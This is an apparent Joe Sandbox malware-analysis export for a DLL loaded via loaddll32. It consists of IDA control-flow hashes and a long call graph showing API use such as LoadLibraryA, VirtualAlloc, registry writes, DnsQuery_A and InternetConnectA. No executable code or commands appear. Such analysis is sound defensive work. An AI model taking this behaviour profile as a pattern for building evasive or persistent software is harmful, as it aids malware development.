                              20428 -> 20447
                              20430 6cd6e524 codecvt
                              20448 6cd53390 GetProcAddress
                              20430 -> 20448
                              20432 6cd6e5a9 codecvt
                              20449 6cd53390 GetProcAddress
                              20432 -> 20449
                              20434 6cd6e632 codecvt
                              20434 -> 20409
                              20436 6cd69ea7 codecvt
                              20435 -> 20436
                              20439 6cd523f0
                              20436 -> 20439
                              20438 6cd69f09 codecvt
                              20438 -> 20416
                              20440 6cd5243a lstrcmpiW
                              20439 -> 20440
                              20441 6cd523ff codecvt
                              20439 -> 20441
                              20440 -> 20438
                              20441 -> 20440
                              20443 6cd53281
                              20442 -> 20443
                              20450 6cd536c0
                              20443 -> 20450
                              20445 6cd532af
                              20445 -> 20420
                              20446 -> 20428
                              20447 -> 20430
                              20448 -> 20432
                              20449 -> 20434
                              20451 6cd5370a VirtualAlloc
                              20450 -> 20451
                              20452 6cd536cf codecvt
                              20450 -> 20452
                              20451 -> 20445
                              20452 -> 20451
                              20456 6cd518e0 6 API calls
                              20458 6cd52680 5 API calls codecvt

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: CountTick$Sleep
                              • String ID: F$d
                              • API String ID: 4250438611-811691143
                              • Opcode ID: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction ID: 5741d3671f550c46167cfbcedb5e4d7b338e2c59d17bfafe5065f546fc8f0359
                              • Opcode Fuzzy Hash: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction Fuzzy Hash: 54015A30E04298EFDF04EFACCA0529DBB71FF02315F5082AAD921A2654DB75CA61EB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 256 6cd51880-6cd5188c 257 6cd5188e-6cd518a3 256->257 258 6cd518a9-6cd518b3 256->258 257->258 259 6cd518b5-6cd518b9 258->259 260 6cd518c4 call 6cd510c0 258->260 261 6cd518bd call 6cd51090 259->261 262 6cd518bb 259->262 264 6cd518c9-6cd518d1 260->264 266 6cd518c2 261->266 262->264 266->264
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57ae0b83bc06da084a12ea2a1f165d55f6268bd7004894f2c42e5e106f577650
                              • Instruction ID: 0f96bea7785d41292f6f3aa5a275ab1279c1903ebae1e174f5ea36758039214f
                              • Opcode Fuzzy Hash: 57ae0b83bc06da084a12ea2a1f165d55f6268bd7004894f2c42e5e106f577650
                              • Instruction Fuzzy Hash: 21F0A030A17144EBEF10CF48C502799B7FCEB4B35CF50415BD91047B68C231E960DA51

                              Control-flow Graph

                              APIs
                              • VirtualAlloc.KERNELBASE(?,?,?,?,?,6CD6E40E), ref: 6CD5371A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 18c9fd947433894486e39d4e44776a1db5a7f45d8959b56d18ff4c496b4bd0b2
                              • Instruction ID: 4f7e6e94b9f1c4ee54ddf013e898287d6fa8900d735b89b917a7d526e38606e1
                              • Opcode Fuzzy Hash: 18c9fd947433894486e39d4e44776a1db5a7f45d8959b56d18ff4c496b4bd0b2
                              • Instruction Fuzzy Hash: 6AF08975B05109BBDF00DFA4DC50F9E3BBCAB46305F414555F90567A60EB709D2887B1

                              Control-flow Graph

                              APIs
                              • lstrcmpiW.KERNELBASE(00000000,?,00000000,00000000), ref: 6CD52442
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: lstrcmpi
                              • String ID:
                              • API String ID: 1586166983-0
                              • Opcode ID: a61ecba4ec507862f6c0f13b7249adf8b9d90ab2d43329e29cc70edc5bd1f5eb
                              • Instruction ID: ab44963cc35f3ed2a3e9543a8ab3320ebbcead6cbf3dcf8efc653e332c127c69
                              • Opcode Fuzzy Hash: a61ecba4ec507862f6c0f13b7249adf8b9d90ab2d43329e29cc70edc5bd1f5eb
                              • Instruction Fuzzy Hash: CDF0A775A01108ABEF509F64DC05E997778A712245F40C119B90666A60DB30556D8BA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: m
                              • API String ID: 0-3775001192
                              • Opcode ID: fd61c5b7c3fb3d1c6e1ce1eeddfec76ad3494625f987970e68f8b0c2a9c98443
                              • Instruction ID: 9400f4abc355b9b606dfa36941e8d8d0afbabc872ba9590905375bb92bee19bd
                              • Opcode Fuzzy Hash: fd61c5b7c3fb3d1c6e1ce1eeddfec76ad3494625f987970e68f8b0c2a9c98443
                              • Instruction Fuzzy Hash: D521C670E49244ABFF01DBB5CC55BAD3BB8AB0320CF408459D54567BA1EB31162DC7B2
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction ID: 8adcfee697f6201d50e44eb6757f91f10167bde8f8e61a10de3c97f86793617b
                              • Opcode Fuzzy Hash: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction Fuzzy Hash: D3D17D74A09208EBDF549F70CC59EDD3BB4BF05348F80451AE40A6BBB0DB34956DCAA5
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97cbd7203d191b498a102ea7784af2dd83e7596d2b3904508cb77ac6cba96286
                              • Instruction ID: ae5a13e0459ae937048b5a6aebbe2db6988076bceeb6a4ed140ce51385f7a9c0
                              • Opcode Fuzzy Hash: 97cbd7203d191b498a102ea7784af2dd83e7596d2b3904508cb77ac6cba96286
                              • Instruction Fuzzy Hash: E8C1C6B0D04159DBCF08CF99C991AEEBBB2FF98304F14815AE854AB255D334AA61CF94
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8711eb5a034fc7b91f54e85c32679345af70936d2d4dc79d77391d6a434eb62e
                              • Instruction ID: 7fa98c739000e41561a0771f63d232714507689b98dba5490e60585b22e27328
                              • Opcode Fuzzy Hash: 8711eb5a034fc7b91f54e85c32679345af70936d2d4dc79d77391d6a434eb62e
                              • Instruction Fuzzy Hash: 46B1D5B1D00259DFCF08CF99D991ADEBBB2FF98304F18815AE814AB255C334A961CF94
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c8a9737debf7333a0f958e2089c6d762d27a878e3007d4562316f9c1ed437a3
                              • Instruction ID: db53bd7639a21f22478eab35f72028f81192deb981867871191b6a3579aceb82
                              • Opcode Fuzzy Hash: 0c8a9737debf7333a0f958e2089c6d762d27a878e3007d4562316f9c1ed437a3
                              • Instruction Fuzzy Hash: 4E5108B0D01209DBCF04CF99C981AEEBBB2FF98304F14C55AE814AB355D334AA61DB94
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 446fac22fc25e5ebe9834733f62750428f8b2cf52dc42aac7255b1b48395739d
                              • Instruction ID: 202c5bbc64701d2d352365a67458e861a538e7f17cdaadcced86d4196f3c6064
                              • Opcode Fuzzy Hash: 446fac22fc25e5ebe9834733f62750428f8b2cf52dc42aac7255b1b48395739d
                              • Instruction Fuzzy Hash: AC51F7B1D0125ADBCF04CF99C981AEEBBB2FF98304F14C55AE814AB355D334AA21DB54
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3f5c2e39cba21bdb3dceb9b457b13817e084fe16dc31f51aa0fd7b9ef98bbbf
                              • Instruction ID: e5374d442c07babde39f7ca289159b05151d6c8dcce8ebfdee7bafcb406f5412
                              • Opcode Fuzzy Hash: e3f5c2e39cba21bdb3dceb9b457b13817e084fe16dc31f51aa0fd7b9ef98bbbf
                              • Instruction Fuzzy Hash: B3112DB4900108ABCB18DF58D891ADEF7B5EF44314F40C159E9195B751DB31EA58CBA4
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 040256c1bb16222d9a274382bac21b8a2c3887b4133735738a20b1eebe1c9a83
                              • Instruction ID: 361b38f4fa081535a69c7a90a883468bb933894a533c7f1a0a34522e839284cb
                              • Opcode Fuzzy Hash: 040256c1bb16222d9a274382bac21b8a2c3887b4133735738a20b1eebe1c9a83
                              • Instruction Fuzzy Hash: 34F01474A00208ABDB08CF58C894B8EBBB5EB48318F10C199EC189F7A1D771EA55CB90
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3a796c32a1ce250fe0e2ef0422a22b2cdcb733c9b7f94d41a40a67be8ccbe9bf
                              • Instruction ID: f78603e8ee5f0b36acaabdba45a544244e262099d4be9ca16e4fae79b71f54a0
                              • Opcode Fuzzy Hash: 3a796c32a1ce250fe0e2ef0422a22b2cdcb733c9b7f94d41a40a67be8ccbe9bf
                              • Instruction Fuzzy Hash: 82D09EB6B28209DBAF49CF59D45281D77FCF346354740426EEA1AC7304D732A8128BD8

                              Control-flow Graph

                              APIs
                              • CreateFileW.KERNEL32(00000000,6CD7835C,00000016,F6A49D28,6CD81084,40000000,00000001,00000000,00000004,00000000,00000000), ref: 6CD526DB
                              • GetLastError.KERNEL32 ref: 6CD52713
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 6CD52725
                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 6CD5273D
                              • CloseHandle.KERNEL32(000000FF), ref: 6CD52747
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastPointerWrite
                              • String ID:
                              • API String ID: 170361235-0
                              • Opcode ID: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction ID: 3f1f36d020c915cd592e4e3ecba8d4696b71eb4a9c80d4df09b741fc4652f337
                              • Opcode Fuzzy Hash: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction Fuzzy Hash: 8E219070B10204AFEF14DFA4CD4AF9937B8AB46704F50811AF705AB6D0DB30A9058BA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 463 6cd6e650-6cd6e689 call 6cd535b0 * 4 472 6cd6e6bf-6cd6e6c6 463->472 473 6cd6e68b-6cd6e69d 463->473 474 6cd6e6fd-6cd6e704 472->474 475 6cd6e6c8-6cd6e6db 472->475 476 6cd6e6ae 473->476 477 6cd6e69f-6cd6e6ac call 6cd6ea20 473->477 480 6cd6e706-6cd6e719 474->480 481 6cd6e73b-6cd6e742 474->481 478 6cd6e6ec 475->478 479 6cd6e6dd-6cd6e6ea call 6cd6ea20 475->479 483 6cd6e6b5 476->483 477->483 485 6cd6e6f3 478->485 479->485 486 6cd6e72a 480->486 487 6cd6e71b-6cd6e728 call 6cd6ea20 480->487 489 6cd6e744-6cd6e756 481->489 490 6cd6e778-6cd6e77b 481->490 483->472 485->474 495 6cd6e731 486->495 487->495 491 6cd6e767 489->491 492 6cd6e758-6cd6e765 call 6cd6ea20 489->492 497 6cd6e76e 491->497 492->497 495->481 497->490
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: codecvt
                              • String ID:
                              • API String ID: 3662085145-0
                              • Opcode ID: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction ID: 646a2e5a06cecb3fb507baee41b3abc8541b517d25ab7457d06c7c1104f644e0
                              • Opcode Fuzzy Hash: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction Fuzzy Hash: 6431C678A0120ADFEB04EF95D994BADB7BABB95308F104419D62137FA0D7752A84CF90

                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:1.3%
                              Total number of Nodes:1175
                              Total number of Limit Nodes:127
execution_graph (Joe Sandbox call-graph export: function nodes at addresses in the 6cd5xxxx-6cd7xxxx range with their call edges; listing truncated here). Windows APIs referenced by the graph nodes: LoadLibraryA, GetProcAddress, Sleep, GetTickCount, RtlAllocateHeap, RtlFreeHeap, VirtualAlloc, VirtualFree, CreateThread, CreateWindowExW, SetTimer, FindCloseChangeNotification, GetTokenInformation, LookupPrivilegeValueW, AdjustTokenPrivileges, RegisterServiceCtrlHandlerExW, RegCreateKeyExW, RegEnumValueA, lstrcmpiW, WSAStartup, socket, gethostbyname, connect, setsockopt, WSAIoctl, getsockname, WSASend, WSARecv, shutdown. Many nodes are annotated "codecvt" (C++ standard-library locale/codecvt code) or "N API calls" where the node aggregates several calls.
codecvt 21259->21261 21260->21246 21262 6cd531d0 codecvt 3 API calls 21261->21262 21262->21260 21264 6cd7016a codecvt 21263->21264 21265 6cd7013f codecvt 21263->21265 21264->21249 21266 6cd531d0 codecvt 3 API calls 21265->21266 21266->21264 21270 6cd54d10 21267->21270 21269 6cd54c94 21269->21234 21271 6cd54d1f codecvt 21270->21271 21273 6cd54d4a codecvt 21270->21273 21272 6cd531d0 codecvt 3 API calls 21271->21272 21272->21273 21273->21269 21275 6cd70f05 codecvt 21274->21275 21292 6cd5d870 21275->21292 21278 6cd70fa5 21282 6cd70f31 21278->21282 21302 6cd5d960 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21278->21302 21281 6cd70f17 codecvt 21281->21278 21281->21282 21283 6cd70fff 21281->21283 21297 6cd71990 21281->21297 21303 6cd71350 LoadLibraryA LoadLibraryA LoadLibraryA 21281->21303 21282->20928 21285 6cd7101b 21283->21285 21304 6cd5d960 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21283->21304 21305 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21285->21305 21287 6cd71095 21306 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21287->21306 21289 6cd710aa 21307 6cd71920 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21289->21307 21291->20931 21293 6cd5d8ba RegCreateKeyExW 21292->21293 21294 6cd5d87f codecvt 21292->21294 21293->21281 21295 6cd531d0 codecvt 3 API calls 21294->21295 21296 6cd5d8aa codecvt 21295->21296 21296->21293 21298 6cd719da RegEnumValueA 21297->21298 21299 6cd7199f codecvt 21297->21299 21298->21281 21300 6cd531d0 codecvt 3 API calls 21299->21300 21301 6cd719ca codecvt 21300->21301 21301->21298 21302->21282 21303->21281 21304->21285 21305->21287 21306->21289 21307->21282 21309 6cd56daf codecvt 21308->21309 21311 6cd56dda codecvt 21308->21311 21310 6cd531d0 codecvt 3 API calls 21309->21310 21310->21311 21311->20934 21313 6cd7186f codecvt 21312->21313 21314 6cd7189a codecvt 21312->21314 21315 6cd531d0 codecvt 3 API calls 21313->21315 21314->20944 21315->21314 21325 6cd71ca0 21316->21325 21318 6cd71743 21319 6cd7174c 21318->21319 
21330 6cd71d10 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21318->21330 21319->20944 21321->20934 21322->20948 21323->20941 21324->20943 21326 6cd71cea DnsQuery_A 21325->21326 21327 6cd71caf codecvt 21325->21327 21326->21318 21328 6cd531d0 codecvt 3 API calls 21327->21328 21329 6cd71cda codecvt 21328->21329 21329->21326 21330->21319 21332 6cd72def codecvt 21331->21332 21333 6cd72e2a recv 21331->21333 21334 6cd531d0 codecvt 3 API calls 21332->21334 21333->20844 21335 6cd72e1a codecvt 21334->21335 21335->21333 21336->20844 21367 6cd6ef20 21337->21367 21339 6cd73d87 21371 6cd74f90 21339->21371 21341 6cd73d8d 21342 6cd68fb0 7 API calls 21341->21342 21343 6cd73db7 21342->21343 21344 6cd73dc0 21343->21344 21398 6cd6f3e0 LoadLibraryA LoadLibraryA LoadLibraryA 21343->21398 21346 6cd73dfd 21344->21346 21399 6cd5bff0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21344->21399 21348 6cd73e18 21346->21348 21350 6cd664a0 3 API calls 21346->21350 21349 6cd73e27 21348->21349 21400 6cd74ff0 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21348->21400 21376 6cd53e50 21349->21376 21350->21348 21354 6cd73e7c 21356 6cd73ed7 21354->21356 21401 6cd75050 LoadLibraryA LoadLibraryA LoadLibraryA codecvt 21354->21401 21355 6cd73e34 21355->21354 21357 6cd52210 4 API calls 21355->21357 21380 6cd73f30 21355->21380 21359 6cd73ee6 21356->21359 21360 6cd56f30 codecvt 4 API calls 21356->21360 21357->21355 21361 6cd73efc 21359->21361 21362 6cd56f30 codecvt 4 API calls 21359->21362 21360->21359 21363 6cd73a50 3 API calls 21361->21363 21362->21361 21364 6cd73f10 21363->21364 21365 6cd53fb0 4 API calls 21364->21365 21366 6cd73f1e 21365->21366 21368 6cd6ef5a codecvt 21367->21368 21369 6cd6ef2f codecvt 21367->21369 21368->21339 21370 6cd531d0 codecvt 3 API calls 21369->21370 21370->21368 21372 6cd74fda SetThreadPriority 21371->21372 21373 6cd74f9f codecvt 21371->21373 21372->21341 21374 6cd531d0 codecvt 3 API calls 21373->21374 21375 6cd74fca codecvt 21374->21375 21375->21372 21377 6cd53e6d 
21376->21377 21378 6cd53ff0 5 API calls 21377->21378 21379 6cd53ec2 21378->21379 21379->21355 21381 6cd73f96 codecvt 21380->21381 21402 6cd71af0 21381->21402 21383 6cd74075 codecvt 21384 6cd74094 21383->21384 21385 6cd7409e 21383->21385 21386 6cd52080 3 API calls 21384->21386 21407 6cd750b0 21385->21407 21388 6cd74099 21386->21388 21392 6cd74116 21388->21392 21494 6cd71c40 21388->21494 21389 6cd740c0 21390 6cd740d3 21389->21390 21391 6cd740c9 21389->21391 21390->21388 21412 6cd74130 21390->21412 21393 6cd52080 3 API calls 21391->21393 21395 6cd74125 21392->21395 21397 6cd71c40 4 API calls 21392->21397 21393->21388 21395->21355 21397->21395 21398->21344 21399->21346 21400->21349 21401->21356 21403 6cd71b3a InternetOpenA 21402->21403 21404 6cd71aff codecvt 21402->21404 21403->21383 21405 6cd531d0 codecvt 3 API calls 21404->21405 21406 6cd71b2a codecvt 21405->21406 21406->21403 21408 6cd750fa InternetConnectA 21407->21408 21409 6cd750bf codecvt 21407->21409 21408->21389 21410 6cd531d0 codecvt 3 API calls 21409->21410 21411 6cd750ea codecvt 21410->21411 21411->21408 21413 6cd65f80 3 API calls 21412->21413 21414 6cd74162 codecvt 21413->21414 21499 6cd751a0 21414->21499 21416 6cd741e2 codecvt 21417 6cd74217 21416->21417 21418 6cd7420a 21416->21418 21504 6cd75300 LoadLibraryA LoadLibraryA 